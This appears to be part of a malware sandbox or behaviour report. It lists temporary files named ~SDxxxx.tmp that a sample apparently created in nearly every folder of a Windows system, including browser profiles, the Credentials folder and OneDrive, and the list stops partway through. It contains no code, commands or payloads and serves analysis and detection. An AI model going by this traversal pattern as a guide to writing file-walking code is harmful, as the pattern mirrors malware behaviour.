file: C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\~SDB5DA.tmp
file: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\~SDB639.tmp
file: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\~SDB659.tmp
file: C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\~SDB689.tmp
file: C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\~SDB6C8.tmp
file: C:\Users\All Users\regid.1991-06.com.microsoft\~SDB727.tmp
file: C:\Users\All Users\shimgen\~SDB795.tmp
file: C:\Users\All Users\shimgen\generatedfiles\~SDB7D5.tmp
file: C:\Users\Default\~SDB7F5.tmp
file: C:\Users\Default\AppData\~SDB825.tmp
file: C:\Users\Default\AppData\Local\~SDB836.tmp
file: C:\Users\Default\AppData\Local\Microsoft\~SDB865.tmp
file: C:\Users\Default\AppData\Local\Microsoft\Windows\~SDB8A5.tmp
file: C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\~SDB8E4.tmp
file: C:\Users\Default\AppData\Local\Microsoft\Windows\History\~SDB905.tmp
file: C:\Users\Default\AppData\Roaming\~SDB915.tmp
file: C:\Users\Default\AppData\Roaming\Media Center Programs\~SDB955.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\~SDB985.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\~SDB9A5.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SDB9D5.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\~SDBA14.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SDBA64.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SDBA94.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\~SDBAB5.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\~SDBAE4.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SDBB14.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SDBB54.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SDBBD2.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDBBF2.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDBC22.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDBC52.tmp
file: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\~SDBC53.tmp
file: C:\Users\Default\Desktop\~SDBC54.tmp
file: C:\Users\Default\Documents\~SDBC55.tmp
file: C:\Users\Default\Downloads\~SDBC56.tmp
file: C:\Users\Default\Favorites\~SDBC57.tmp
file: C:\Users\Default\Links\~SDBC58.tmp
file: C:\Users\Default\Music\~SDBC59.tmp
file: C:\Users\Default\Pictures\~SDBC5A.tmp
file: C:\Users\Default\Saved Games\~SDBC6A.tmp
file: C:\Users\Default\Videos\~SDBC6B.tmp
file: C:\Users\Public\~SDBC6C.tmp
file: C:\Users\Public\Desktop\~SDBC6D.tmp
file: C:\Users\Public\Documents\~SDBC6E.tmp
file: C:\Users\Public\Downloads\~SDBCCD.tmp
file: C:\Users\Public\Favorites\~SDBCFD.tmp
file: C:\Users\Public\Libraries\~SDBD1D.tmp
file: C:\Users\Public\Music\~SDBD5D.tmp
file: C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
file: C:\Users\Public\Pictures\~SDBE1A.tmp
file: C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
file: C:\Users\Public\Recorded TV\~SDC05E.tmp
file: C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
file: C:\Users\Public\Videos\~SDC0DD.tmp
file: C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
file: C:\Users\user\~SDC0EF.tmp
file: C:\Users\user\.ms-ad\~SDC0F0.tmp
file: C:\Users\user\AppData\~SDC0F1.tmp
file: C:\Users\user\AppData\Local\~SDC0F2.tmp
file: C:\Users\user\AppData\Local\Adobe\~SDC103.tmp
file: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDC104.tmp
file: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDC105.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\~SDC106.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\~SDC116.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\~SDC117.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\~SDC176.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\~SDC1B6.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\~SDC214.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\~SDC263.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\~SDC293.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\~SDC2D3.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\~SDC312.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\~SDC342.tmp
file: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\~SDC391.tmp
file: C:\Users\user\AppData\Local\Adobe\ARM\~SDC3D1.tmp
file: C:\Users\user\AppData\Local\Adobe\ARM\S\~SDC3F1.tmp
file: C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SDC450.tmp
file: C:\Users\user\AppData\Local\Adobe\Color\~SDC49F.tmp
file: C:\Users\user\AppData\Local\Apps\~SDC51D.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\~SDC54D.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\~SDC56D.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\~SDC5BC.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\~SDC5EC.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\Data\~SDC60C.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\~SDC66B.tmp
file: C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\~SDC6AB.tmp
file: C:\Users\user\AppData\Local\Boxstarter\~SDC6DA.tmp
file: C:\Users\user\AppData\Local\CEF\~SDC72A.tmp
file: C:\Users\user\AppData\Local\CEF\User Data\~SDC769.tmp
file: C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\~SDC799.tmp
file: C:\Users\user\AppData\Local\Deployment\~SDC7D8.tmp
file: C:\Users\user\AppData\Local\Google\~SDC828.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\~SDC867.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\~SDC8C6.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\~SDC8D6.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\~SDC8D7.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\~SDC8D8.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\~SDC8D9.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\~SDC8DA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\~SDC8DB.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\~SDC8EC.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\~SDC95A.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SDC9AA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SDCA08.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCA57.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\~SDCAC6.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SDCB34.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCBA3.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SDCBE2.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCC22.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCC32.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCC33.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCC34.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCC35.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCC36.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCC66.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCC96.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SDCCD5.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SDCD34.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SDCD74.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCDB3.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCE02.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SDCE51.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDCE91.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SDCEB1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SDCEE1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SDCF01.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCF22.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCF71.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCF91.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCFB1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SDCFE1.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SDD04F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\~SDD09F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SDD0DE.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SDD10E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SDD14D.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SDD16E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDD1AD.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDD1ED.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDD23C.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDD25C.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDD29C.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SDD2CB.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SDD2EC.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\~SDD32B.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\~SDD37A.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\~SDD3AA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\~SDD3EA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\~SDD41A.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data\~SDD459.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\~SDD489.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\~SDD4C8.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints\~SDD4F8.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\~SDD4F9.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata\~SDD4FA.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl\~SDD4FB.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved\~SDD4FC.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\~SDD50D.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\~SDD50E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\~SDD54D.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\~SDD55E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\~SDD57E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\~SDD59F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\~SDD5BF.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\~SDD5EF.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\~SDD61F.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm\~SDD65E.tmp
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\~SDD69E.tmp
file: C:\Users\user\AppData\Local\Microsoft\~SDD6DD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Credentials\~SDD70D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Device Metadata\~SDD73D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\~SDD77C.tmp
file: C:\Users\user\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads\~SDD78D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\~SDD7AD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\~SDD7CD.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\~SDD7EE.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\~SDD81E.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\~SDD87C.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\~SDD8BC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\~SDD90B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\~SDD979.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\~SDD9D8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6af35b70-7d44-4f46-9acd-3b4fa9cd6081\~SDDA27.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\~SDDA67.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\~SDDAA6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\~SDDAA7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\~SDDAC7.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\~SDDAD8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\~SDDAE9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\~SDDAF9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\~SDDB1A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\~SDDB2A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\~SDDB2B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\~SDDB3C.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDDB8B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\~SDDBDA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\~SDDC29.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\~SDDC49.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\~SDDC5A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\~SDDC9A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\~SDDCD9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\~SDDCF9.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Platform Notifications\~SDDD39.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\~SDDD59.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\~SDDDB8.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\~SDDE07.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\~SDDE56.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\~SDDE76.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\~SDDEA6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\~SDDEE6.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\~SDDF35.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\~SDDF84.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\~SDDFD3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\~SDE022.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\~SDE081.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\~SDE0A1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\~SDE0E1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\~SDE101.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\~SDE150.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Platform Notifications\~SDE1CE.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\~SDE21D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\~SDE24D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\~SDE26D.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FontLookupTableCache\~SDE2BC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PepperFlash\~SDE2FC.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\~SDE36A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\~SDE39A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\~SDE3DA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\~SDE3EA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\~SDE40B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\~SDE42B.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\~SDE46A.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\~SDE4AA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\~SDE4DA.tmp
file: C:\Users\user\AppData\Local\Microsoft\Event Viewer\~SDE529.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\~SDE6B4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\BD5QM5PR\~SDE6F4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\S0OSSLWD\~SDE733.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\SQ4TDUZM\~SDE773.tmp
file: C:\Users\user\AppData\Local\Microsoft\Feeds Cache\ZLFI91IZ\~SDE7A3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\~SDE7D3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\~SDE822.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieSiteList\~SDE8F3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EmieUserList\~SDE932.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\EUPP\~SDE982.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\~SDE9E0.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\~SDEA2F.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\l51tpzc\~SDEA40.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\rs8lb9c\~SDEA60.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\~SDEABF.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\~SDEAFF.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\~SDEB2E.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\~SDEB4F.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\TabRoaming\~SDEB5F.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\~SDEB60.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\~SDEB71.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\~SDEB72.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\~SDEB73.tmp
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\~SDEB74.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\~SDEBB3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\~SDEBE3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\~SDEBF4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000C0CE\~SDEC24.tmp
file: C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\~SDEC44.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\~SDEC74.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\~SDECB3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\~SDED03.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\~SDED32.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\binaries.templates.cdn.office.net\~SDED62.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\cdn.odc.officeapps.live.com\~SDEDD1.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\15.0\WebServiceCache\AllUsers\office15client.microsoft.com\~SDEDD2.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\~SDEDD3.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\~SDEDD4.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\~SDEDD5.tmp
file: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WEF\AppCommands\~SDEDE5.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\~SDEDE6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\~SDEDE7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\af\~SDEDF8.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\am-et\~SDEDF9.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\~SDEDFA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ar\~SDEDFB.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\as-in\~SDEDFC.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\az-latn-az\~SDEDFD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\be\~SDEDFE.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bg\~SDEE1E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-bd\~SDEE4E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bn-in\~SDEE7E.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\~SDEECD.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\~SDEF3B.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\~SDEF6B.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\~SDEFCA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\~SDEFFA.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\~SDF0A7.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\~SDF0E6.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\~SDF126.tmp
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\~SDF156.tmp
